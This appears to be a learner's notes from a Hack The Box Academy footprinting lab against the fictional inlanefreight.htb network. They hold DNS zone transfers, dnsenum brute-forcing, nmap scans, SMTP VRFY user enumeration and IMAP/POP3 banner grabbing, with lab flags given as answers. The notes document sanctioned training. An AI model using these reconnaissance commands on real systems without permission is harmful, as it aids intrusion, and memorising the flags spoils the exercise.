 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 inlanefreight.htb.	604800	IN	TXT	"MS=ms97310371"
 inlanefreight.htb.	604800	IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 inlanefreight.htb.	604800	IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 inlanefreight.htb.	604800	IN	NS	ns.inlanefreight.htb.
 app.inlanefreight.htb.	604800	IN	A	10.129.18.15
 dev.inlanefreight.htb.	604800	IN	A	10.12.0.1
 internal.inlanefreight.htb. 604800 IN	A	10.129.1.6
 mail1.inlanefreight.htb. 604800	IN	A	10.129.18.201
 ns.inlanefreight.htb.	604800	IN	A	127.0.0.1
 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:28:17 CDT 2025
 ;; XFR size: 11 records (messages 1, bytes 560)

root@htb:~$ dig axfr internal.inlanefreight.htb @10.129.235.219
 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr internal.inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
 internal.inlanefreight.htb. 604800 IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 internal.inlanefreight.htb. 604800 IN	TXT	"MS=ms97310371"
 internal.inlanefreight.htb. 604800 IN	TXT	"HTB{DN5_z0N3_7r4N5F3r_iskdufhcnlu34}"
 internal.inlanefreight.htb. 604800 IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 internal.inlanefreight.htb. 604800 IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 internal.inlanefreight.htb. 604800 IN	NS	ns.inlanefreight.htb.
 dc1.internal.inlanefreight.htb.	604800 IN A	10.129.34.16
 dc2.internal.inlanefreight.htb.	604800 IN A	10.129.34.11
 mail1.internal.inlanefreight.htb. 604800 IN A	10.129.18.200
 ns.internal.inlanefreight.htb. 604800 IN A	127.0.0.1
 vpn.internal.inlanefreight.htb.	604800 IN A	10.129.1.6
 ws1.internal.inlanefreight.htb.	604800 IN A	10.129.1.34
 ws2.internal.inlanefreight.htb.	604800 IN A	10.129.1.35
 wsus.internal.inlanefreight.htb. 604800	IN A	10.129.18.2
 internal.inlanefreight.htb. 604800 IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:30:18 CDT 2025
 ;; XFR size: 15 records (messages 1, bytes 677)

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

root@htb:~$ nmap -sS -sU -Pn -n -T4 10.129.0.0/16 -p U:53,T:53 --max-retries 0 --open -oA dnsCandidates
 Nmap scan report for 10.129.235.219
 Host is up (0.0091s latency).

 PORT   STATE SERVICE
 53/tcp open  domain
 53/udp open  domain

root@htb:~$ dig any inlanefreight.htb @10.129.235.219
 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> any inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
 ;; Got answer:
 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32410
 ;; flags: qr aa rd; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 2
 ;; WARNING: recursion requested but not available

 ;; OPT PSEUDOSECTION:
 ; EDNS: version: 0, flags:; udp: 4096
 ; COOKIE: 6d51bd32faf48f240100000068cf37976e5569447223816e (good)
 ;; QUESTION SECTION:
 ;inlanefreight.htb.		IN	ANY

 ;; ANSWER SECTION:
 inlanefreight.htb.	604800	IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 inlanefreight.htb.	604800	IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 inlanefreight.htb.	604800	IN	TXT	"MS=ms97310371"
 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 inlanefreight.htb.	604800	IN	NS	ns.inlanefreight.htb.

 ;; ADDITIONAL SECTION:
 ns.inlanefreight.htb.	604800	IN	A	127.0.0.1

 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:24:07 CDT 2025
 ;; MSG SIZE  rcvd: 437

root@htb:~$ dig axfr inlanefreight.htb @10.129.235.219

 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 inlanefreight.htb.	604800	IN	TXT	"MS=ms97310371"
 inlanefreight.htb.	604800	IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 inlanefreight.htb.	604800	IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 inlanefreight.htb.	604800	IN	NS	ns.inlanefreight.htb.
 app.inlanefreight.htb.	604800	IN	A	10.129.18.15
 dev.inlanefreight.htb.	604800	IN	A	10.12.0.1
 internal.inlanefreight.htb. 604800 IN	A	10.129.1.6
 mail1.inlanefreight.htb. 604800	IN	A	10.129.18.201
 ns.inlanefreight.htb.	604800	IN	A	127.0.0.1
 inlanefreight.htb.	604800	IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:28:17 CDT 2025
 ;; XFR size: 11 records (messages 1, bytes 560)

root@htb:~$ dig axfr internal.inlanefreight.htb @10.129.235.219
 ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr internal.inlanefreight.htb @10.129.235.219
 ;; global options: +cmd
 internal.inlanefreight.htb. 604800 IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 internal.inlanefreight.htb. 604800 IN	TXT	"MS=ms97310371"
 internal.inlanefreight.htb. 604800 IN	TXT	"HTB{DN5_z0N3_7r4N5F3r_iskdufhcnlu34}"
 internal.inlanefreight.htb. 604800 IN	TXT	"atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
 internal.inlanefreight.htb. 604800 IN	TXT	"v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_spf.atlassian.net ip4:10.129.124.8 ip4:10.129.127.2 ip4:10.129.42.106 ~all"
 internal.inlanefreight.htb. 604800 IN	NS	ns.inlanefreight.htb.
 dc1.internal.inlanefreight.htb.	604800 IN A	10.129.34.16
 dc2.internal.inlanefreight.htb.	604800 IN A	10.129.34.11
 mail1.internal.inlanefreight.htb. 604800 IN A	10.129.18.200
 ns.internal.inlanefreight.htb. 604800 IN A	127.0.0.1
 vpn.internal.inlanefreight.htb.	604800 IN A	10.129.1.6
 ws1.internal.inlanefreight.htb.	604800 IN A	10.129.1.34
 ws2.internal.inlanefreight.htb.	604800 IN A	10.129.1.35
 wsus.internal.inlanefreight.htb. 604800	IN A	10.129.18.2
 internal.inlanefreight.htb. 604800 IN	SOA	inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
 ;; Query time: 9 msec
 ;; SERVER: 10.129.235.219#53(10.129.235.219) (TCP)
 ;; WHEN: Sat Sep 20 18:30:18 CDT 2025
 ;; XFR size: 15 records (messages 1, bytes 677)

root@htb:~$ find / -name subdomains-* -type f 2>/dev/null
 /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 /usr/share/seclists/Discovery/DNS/subdomains-spanish.txt
 /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 /usr/share/dnsrecon/subdomains-top1mil.txt
 /usr/share/dnsrecon/subdomains-top1mil-5000.txt
 /usr/share/dnsrecon/subdomains-top1mil-20000.txt
 
root@htb:~$ find / -name fierce* -type f 2>/dev/null
 /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

root@htb:~$ dnsenum --dnsserver 10.129.236.224 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt dev.inlanefreight.htb
 dnsenum VERSION:1.2.6

 -----   dev.inlanefreight.htb   -----

 Host's addresses:
 __________________

 Name Servers:
 ______________

 ns.inlanefreight.htb.                    604800   IN    A         127.0.0.1

 Mail (MX) Servers:
 ___________________

 Trying Zone Transfers and getting Bind Versions:
 _________________________________________________

 unresolvable name: ns.inlanefreight.htb at /usr/bin/dnsenum line 900 thread 2.

 Trying Zone Transfer for dev.inlanefreight.htb on ns.inlanefreight.htb ... 
 AXFR record query failed: no nameservers

 Brute forcing with /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt:
 __________________________________________________________________________

 dev1.dev.inlanefreight.htb.              604800   IN    A         10.12.3.6
 ns.dev.inlanefreight.htb.                604800   IN    A         127.0.0.1
 win2k.dev.inlanefreight.htb.             604800   IN    A        10.12.3.203

 Launching Whois Queries:
 _________________________

 dev.inlanefreight.htb_____________________

 Performing reverse lookup on 0 ip addresses:
 _____________________________________________

 0 results out of 0 IP addresses.

 dev.inlanefreight.htb ip blocks:
 _________________________________

 done.

SMTP

Enumerate the SMTP service and submit the banner, including its version as the answer.

root@htb:~$ nmap -sV -T4 --open 10.129.230.7 -oA quickServiceScan
 PORT     STATE SERVICE  VERSION
 22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 25/tcp   open  smtp
 53/tcp   open  domain   ISC BIND 9.16.1 (Ubuntu Linux)
 110/tcp  open  pop3     Dovecot pop3d
 143/tcp  open  imap     Dovecot imapd
 993/tcp  open  ssl/imap Dovecot imapd
 995/tcp  open  ssl/pop3 Dovecot pop3d
 3306/tcp open  mysql    MySQL 8.0.27-0ubuntu0.20.04.1
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 SF-Port25-TCP:V=7.94SVN%I=7%D=10/5%Time=68E3311B%P=x86_64-pc-linux-gnu%r(H
 SF:ello,36,"220\x20InFreight\x20ESMTP\x20v2\.11\r\n501\x20Syntax:\x20EHLO\
 SF:x20hostname\r\n");
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
root@htb:~$ nmap -sV -T4 --open 10.129.230.7 -p- fullServiceScan
 PORT      STATE SERVICE  VERSION
 22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 25/tcp    open  smtp
 53/tcp    open  domain   ISC BIND 9.16.1 (Ubuntu Linux)
 110/tcp   open  pop3     Dovecot pop3d
 143/tcp   open  imap     Dovecot imapd
 993/tcp   open  ssl/imap Dovecot imapd
 995/tcp   open  ssl/pop3 Dovecot pop3d
 3306/tcp  open  mysql    MySQL 8.0.27-0ubuntu0.20.04.1
 33060/tcp open  mysqlx?
 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port25-TCP:V=7.94SVN%I=7%D=10/5%Time=68E32FCE%P=x86_64-pc-linux-gnu%r(N
 SF:ULL,1B,"220\x20InFreight\x20ESMTP\x20v2\.11\r\n")%r(Hello,36,"220\x20In
 SF:Freight\x20ESMTP\x20v2\.11\r\n501\x20Syntax:\x20EHLO\x20hostname\r\n");
 ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 SF-Port33060-TCP:V=7.94SVN%I=7%D=10/5%Time=68E32FCE%P=x86_64-pc-linux-gnu%
 SF:r(NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x
 SF:0b\x08\x05\x1a\0");
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

root@htb:~$ sudo nmap -sV -sC -T4 10.129.230.7 -p 25
 PORT   STATE SERVICE VERSION
 25/tcp open  smtp
 |_smtp-commands: mail1, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
 | fingerprint-strings: 
 |   Hello: 
 |     220 InFreight ESMTP v2.11
 |_    Syntax: EHLO hostname
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 SF-Port25-TCP:V=7.94SVN%I=7%D=10/5%Time=68E330FB%P=x86_64-pc-linux-gnu%r(H
 SF:ello,36,"220\x20InFreight\x20ESMTP\x20v2\.11\r\n501\x20Syntax:\x20EHLO\
 SF:x20hostname\r\n");

Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

root@oco:~$ apt search smtp-user-enum
 Sorting... Done
 Full Text Search... Done
 smtp-user-enum/parrot6,now 1.2-1parrot1 all [installed]
  Username guessing tool for the SMTP service

root@oco:~$ sudo apt install smtp-user-enum
 ...

root@htb:~$ which smtp-user-enum 
 /usr/bin/smtp-user-enum
 
root@htb:~$ curl -O https://academy.hackthebox.com/storage/resources/Footprinting-wordlist.zip
root@htb:~$ unzip Footprinting-wordlist.zip
 
root@htb:~$ smtp-user-enum -m VRFY -U footprinting-wordlist.txt -V 10.129.221.54 25
 [Reconn 1/3] [Retry 1/5] Testing: VRFY heather ...
 [Reconn 1/3] [Retry 1/5] Waiting for answer ...
 [----] heather     550 5.1.1 <heather>: Recipient address rejected: User unknown in local recipient table
 [Reconn 1/3] [Retry 1/5] Testing: VRFY rachel ...
 [Reconn 1/3] [Retry 1/5] Waiting for answer ...
 [----] rachel      550 5.1.1 <rachel>: Recipient address rejected: User unknown in local recipient table

root@htb:~$  smtp-user-enum -m VRFY -u robin -V 10.129.221.54 25 | grep -v rejected
 Connecting to 10.129.221.54 25 ...
 [1/4] Connecting to 10.129.221.54:25 ...
 [1/4] Waiting for banner ...
 220 InFreight ESMTP v2.11
 [1/4] Sending greeting: HELO changeme
 [1/4] Waiting for greeting reply ...
 250 mail1
 Start enumerating users with VRFY mode ...
 [Reconn 1/3] [Retry 1/5] Testing: VRFY robin ...
 [Reconn 1/3] [Retry 1/5] Waiting for answer ...
 [----] robin 252 2.0.0 robin

 * -m refers to mode
    - VRFY is used to enumerate existing users on the system
 * -U refers to wordlist
 * -V refers to verbose output

IMAP/POP3

Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer.

root@oco:~$ sudo nmap -sV -sC -T4 10.129.14.128 -p 110,143,993,995
 PORT    STATE SERVICE  VERSION
 110/tcp open  pop3     Dovecot pop3d
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=dev.inlanefreight.htb/organizationName=InlaneFreight Ltd/stateOrProvinceName=London/countryName=UK
 | Not valid before: 2021-11-08T23:10:05
 |_Not valid after:  2295-08-23T23:10:05
 |_pop3-capabilities: SASL UIDL RESP-CODES TOP CAPA AUTH-RESP-CODE PIPELINING STLS
 143/tcp open  imap     Dovecot imapd
 |_imap-capabilities: IMAP4rev1 post-login have more LITERAL+ listed capabilities ID OK IDLE LOGIN-REFERRALS Pre-login LOGINDISABLEDA0001 ENABLE SASL-IR STARTTLS
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=dev.inlanefreight.htb/organizationName=InlaneFreight Ltd/stateOrProvinceName=London/countryName=UK
 | Not valid before: 2021-11-08T23:10:05
 |_Not valid after:  2295-08-23T23:10:05
 993/tcp open  ssl/imap Dovecot imapd
 |_imap-capabilities: IMAP4rev1 have more LITERAL+ AUTH=PLAINA0001 capabilities ID OK IDLE LOGIN-REFERRALS listed Pre-login ENABLE SASL-IR post-login
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=dev.inlanefreight.htb/organizationName=InlaneFreight Ltd/stateOrProvinceName=London/countryName=UK
 | Not valid before: 2021-11-08T23:10:05
 |_Not valid after:  2295-08-23T23:10:05
 995/tcp open  ssl/pop3 Dovecot pop3d
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=dev.inlanefreight.htb/organizationName=InlaneFreight Ltd/stateOrProvinceName=London/countryName=UK
 | Not valid before: 2021-11-08T23:10:05
 |_Not valid after:  2295-08-23T23:10:05
 |_pop3-capabilities: USER UIDL RESP-CODES TOP CAPA AUTH-RESP-CODE PIPELINING SASL(PLAIN)

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds

What is the FQDN that the IMAP and POP3 servers are assigned to?

root@oco:~$ sudo nmap -sV -sC -T4 10.129.14.128 -p 110,143,993,995
 PORT    STATE SERVICE  VERSION
 110/tcp open  pop3     Dovecot pop3d
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=dev.inlanefreight.htb/organizationName=InlaneFreight Ltd/stateOrProvinceName=London/countryName=UK
 | Not valid before: 2021-11-08T23:10:05
 |_Not valid after:  2295-08-23T23:10:05
 |_pop3-capabilities: SASL UIDL RESP-CODES TOP CAPA AUTH-RESP-CODE PIPELINING STLS
 143/tcp open  imap     Dovecot imapd
 |_imap-capabilities: IMAP4rev1 post-login have more LITERAL+ listed capabilities ID OK IDLE LOGIN-REFERRALS Pre-login LOGINDISABLEDA0001 ENABLE SASL-IR STARTTLS
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=dev.inlanefreight.htb/organizationName=InlaneFreight Ltd/stateOrProvinceName=London/countryName=UK
 | Not valid before: 2021-11-08T23:10:05
 |_Not valid after:  2295-08-23T23:10:05
 993/tcp open  ssl/imap Dovecot imapd
 |_imap-capabilities: IMAP4rev1 have more LITERAL+ AUTH=PLAINA0001 capabilities ID OK IDLE LOGIN-REFERRALS listed Pre-login ENABLE SASL-IR post-login
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=dev.inlanefreight.htb/organizationName=InlaneFreight Ltd/stateOrProvinceName=London/countryName=UK
 | Not valid before: 2021-11-08T23:10:05
 |_Not valid after:  2295-08-23T23:10:05
 995/tcp open  ssl/pop3 Dovecot pop3d
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=dev.inlanefreight.htb/organizationName=InlaneFreight Ltd/stateOrProvinceName=London/countryName=UK
 | Not valid before: 2021-11-08T23:10:05
 |_Not valid after:  2295-08-23T23:10:05
 |_pop3-capabilities: USER UIDL RESP-CODES TOP CAPA AUTH-RESP-CODE PIPELINING SASL(PLAIN)

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds

Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...})

root@oco:~$ openssl s_client -connect 10.129.71.178:imaps
 CONNECTED(00000003)
 Can't use SSL_get_servername
 depth=0 C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 verify error:num=18:self-signed certificate
 verify return:1
 depth=0 C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 verify return:1
 ---
 Certificate chain
 0 s:C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
   i:C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Nov  8 23:10:05 2021 GMT; NotAfter: Aug 23 23:10:05 2295 GMT
 ---
 Server certificate
 -----BEGIN CERTIFICATE-----
 MIIEUzCCAzugAwIBAgIUDf35PqFuv6Uv0EECM8dFmNSZoY8wDQYJKoZIhvcNAQEL
 BQAwgbcxCzAJBgNVBAYTAlVLMQ8wDQYDVQQIDAZMb25kb24xDzANBgNVBAcMBkxv
 bmRvbjEaMBgGA1UECgwRSW5sYW5lRnJlaWdodCBMdGQxHDAaBgNVBAsME0Rldk9w
 cyBEZXDDg2FydG1lbnQxHjAcBgNVBAMMFWRldi5pbmxhbmVmcmVpZ2h0Lmh0YjEs
 MCoGCSqGSIb3DQEJARYdY3RvLmRldkBkZXYuaW5sYW5lZnJlaWdodC5odGIwIBcN
 MjExMTA4MjMxMDA1WhgPMjI5NTA4MjMyMzEwMDVaMIG3MQswCQYDVQQGEwJVSzEP
 MA0GA1UECAwGTG9uZG9uMQ8wDQYDVQQHDAZMb25kb24xGjAYBgNVBAoMEUlubGFu
 ZUZyZWlnaHQgTHRkMRwwGgYDVQQLDBNEZXZPcHMgRGVww4NhcnRtZW50MR4wHAYD
 VQQDDBVkZXYuaW5sYW5lZnJlaWdodC5odGIxLDAqBgkqhkiG9w0BCQEWHWN0by5k
 ZXZAZGV2LmlubGFuZWZyZWlnaHQuaHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
 MIIBCgKCAQEAxvMwFE6m+iBUSujb5d6DUy1xDYR5awzQRwddyvq6iBrMxbnptSrn
 +j0UOKWHCOpD5LREwP26ghUg0lVJzfo+v5pQJGnxEXKg0OFlzWEd8xgx/JWW/z1/
 rDsWlNa2yYZkCy68YWJlC7UZxvcDFrI0V0pDJIkrjForw26laoYDkrh1A5F8uUXD
 1TwRLLYo+NGmtNHT3BADJpv6aFUZ4CGrqBQNi7XpsTZ948WLhUwQvWmebiK06Dai
 TvMNKBctjWAiNI4xvq34W9hIUaPxT1JJzuujRslep6nHGHW00QEWTWgyOMYThc3b
 HtKIHMfDLTUMz7s8RhVVwlWE6+ly1DMRgQIDAQABo1MwUTAdBgNVHQ4EFgQUGDTC
 9B5KCKPWT7vXbnMunL/mEE4wHwYDVR0jBBgwFoAUGDTC9B5KCKPWT7vXbnMunL/m
 EE4wDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEADh0v5XWCf3KO
 atrWcoiIOC67Z0ZIO7yEF+fQo8z+Wx1dWzmCFVu7u4+l7slcdJICCGBbOX8eItWS
 chwzgnWJToyX8PWY8lSaB8ifMDQcr457Y7O6NmvgU35sRcLnYYqXzu2oh0lxsFLR
 vL1wpyDLPhhoI++j1fELhiJ3GWiUQrb0vfJPcbSkHTgzf0hm7mLJTaqt3WfS/Gr2
 8Oh7vSfzvqvHLE7HHAO0G5Q81zo+wWsrQF0s40HEF/raEMfOy2Htm79YjyjAlLWf
 ueS+u8rX2smOYdRIpL3UPx7+yZPGu47vYoetde1Z5cfTCgmeS05BQ2qMOp6Tw6+G
 xUuqg8nK1Q==
 -----END CERTIFICATE-----
 subject=C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 issuer=C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 ---
 No client certificate CA names sent
 Peer signing digest: SHA256
 Peer signature type: RSA-PSS
 Server Temp Key: X25519, 253 bits
 ---
 SSL handshake has read 1667 bytes and written 377 bytes
 Verification error: self-signed certificate
 ---
 New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
 Server public key is 2048 bit
 Secure Renegotiation IS NOT supported
 Compression: NONE
 Expansion: NONE
 No ALPN negotiated
 Early data was not sent
 Verify return code: 18 (self-signed certificate)
 ---
 ---
 Post-Handshake New Session Ticket arrived:
 SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: 77C9728E512CA316C658FB1B6A67D9FB09F0898455CF0BE4B81F7B7A010EC7A9
    Session-ID-ctx: 
    Resumption PSK: 5C4EB2A0EDDCE9D44ABA011C7D3498830C957CAC46C16D9457A7B9F2E22F9C4FB3CD06C9B814B44757C4474BC1163D69
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 7200 (seconds)
    TLS session ticket:
    0000 - 2b a6 5e 01 1c a6 96 67-dd 76 7f 33 e3 f2 e1 6e   +.^....g.v.3...n
    0010 - 0a c1 86 38 3d eb 03 db-05 44 87 0c 8c c4 58 48   ...8=....D....XH
    0020 - bf ab d0 b5 61 d8 7a 6f-e6 d4 7d 65 5c 33 fc 66   ....a.zo..}e\3.f
    0030 - 1a a8 cf 4b 5b 34 59 71-d8 d4 2d 28 90 56 57 8f   ...K[4Yq..-(.VW.
    0040 - 27 59 ae ca 18 95 8f 2f-60 97 87 c1 1a 69 bb b4   'Y...../`....i..
    0050 - 37 c7 3d c1 da fc 3a d0-4a 57 db 37 5d 43 19 1c   7.=...:.JW.7]C..
    0060 - 01 75 db ec c5 55 e3 aa-c3 0f 1e ed e9 04 e1 84   .u...U..........
    0070 - 09 e6 3b b8 94 8b 59 5e-c8 47 45 0b 79 e2 85 f2   ..;...Y^.GE.y...
    0080 - 09 9c 53 c7 85 a3 a8 d0-08 88 9a 81 77 95 2c bd   ..S.........w.,.
    0090 - b8 b7 86 fd ac 3c 37 bd-82 31 cf fd f4 0f 8e 03   .....<7..1......
    00a0 - 3a 2c 37 d7 ac 75 90 dc-ba 83 ce 64 cf 0d b0 3d   :,7..u.....d...=
    00b0 - ad b5 f0 da 83 26 11 c8-1c 41 96 49 b0 2c ac 8a   .....&...A.I.,..

    Start Time: 1760925245
    Timeout   : 7200 (sec)
    Verify return code: 18 (self-signed certificate)
    Extended master secret: no
    Max Early Data: 0
 ---
 read R BLOCK
 ---
 Post-Handshake New Session Ticket arrived:
 SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: 3E836D65EF6025CF3C73FCCC0963BBC3625AEAA47522E2C2FA670F7AFC2BB6DF
    Session-ID-ctx: 
    Resumption PSK: D2F6AD505E81572282695F0E3DE025C901D4C763AFA45C647E5F3F70EF1B07E53D1378E4BCD10E54F12F7ED9E6EB33D7
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 7200 (seconds)
    TLS session ticket:
    0000 - 2b a6 5e 01 1c a6 96 67-dd 76 7f 33 e3 f2 e1 6e   +.^....g.v.3...n
    0010 - 48 82 74 c1 e2 f4 d2 9c-bd f8 82 d8 00 ef f6 8f   H.t.............
    0020 - 5e a3 8f 36 75 2b 22 e3-a2 06 c4 57 27 f5 34 0c   ^..6u+"....W'.4.
    0030 - c5 ab f5 1e 9b 5e 60 4e-44 88 84 c3 50 89 e2 26   .....^`ND...P..&
    0040 - 05 9d e8 e8 c5 b7 8b 11-a1 7f e0 cc e6 72 d6 42   .............r.B
    0050 - f0 40 e7 4a 17 64 1e c1-49 ad 4f 8f 3a 35 88 d6   [email protected].:5..
    0060 - 14 5a 5e a1 60 08 32 b3-09 69 30 26 48 9e b0 73   .Z^.`.2..i0&H..s
    0070 - a6 c2 b0 c0 48 02 2b f2-1c 67 c5 34 78 bb d0 f7   ....H.+..g.4x...
    0080 - e6 e6 f3 35 66 c4 be f5-40 4b 9e 12 91 76 d5 73   [email protected]
    0090 - 33 65 12 85 72 dc d4 c7-4d f4 4a 27 c7 34 13 de   3e..r...M.J'.4..
    00a0 - 52 f2 87 2b cb 70 36 fd-85 b8 d3 60 74 05 df 6a   R..+.p6....`t..j
    00b0 - 60 14 77 b2 25 6d 20 a6-5c 73 a5 f1 d2 44 f0 a5   `.w.%m .\s...D..

    Start Time: 1760925245
    Timeout   : 7200 (sec)
    Verify return code: 18 (self-signed certificate)
    Extended master secret: no
    Max Early Data: 0
 ---
 read R BLOCK
 * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] HTB{roncfbw7iszerd7shni7jr2343zhrj}

What is the customized version of the POP3 server?

root@oco:~$ curl -k 'pop3://10.129.71.178' -v
 * Trying 10.129.71.178:110...
 * Connected to 10.129.71.178 (10.129.71.178) port 110 (#0)
 < +OK InFreight POP3 v9.188
 > CAPA
 < +OK
 < CAPA
 < TOP
 < UIDL
 < RESP-CODES
 < PIPELINING
 < AUTH-RESP-CODE
 < STLS
 < SASL
 < .
 > LIST
 < -ERR Unknown command.
 > QUIT
 < +OK Logging out
 * Closing connection 0
 curl: (8) Weird server reply

What is the admin email address?

root@htb:~$ which smtp-user-enum 
 /usr/bin/smtp-user-enum
 
root@htb:~$ curl -O https://academy.hackthebox.com/storage/resources/Footprinting-wordlist.zip
root@htb:~$ unzip Footprinting-wordlist.zip
 
root@htb:~$ smtp-user-enum -m VRFY -U footprinting-wordlist.txt -V 10.129.221.54 25
 [Reconn 1/3] [Retry 1/5] Testing: VRFY heather ...
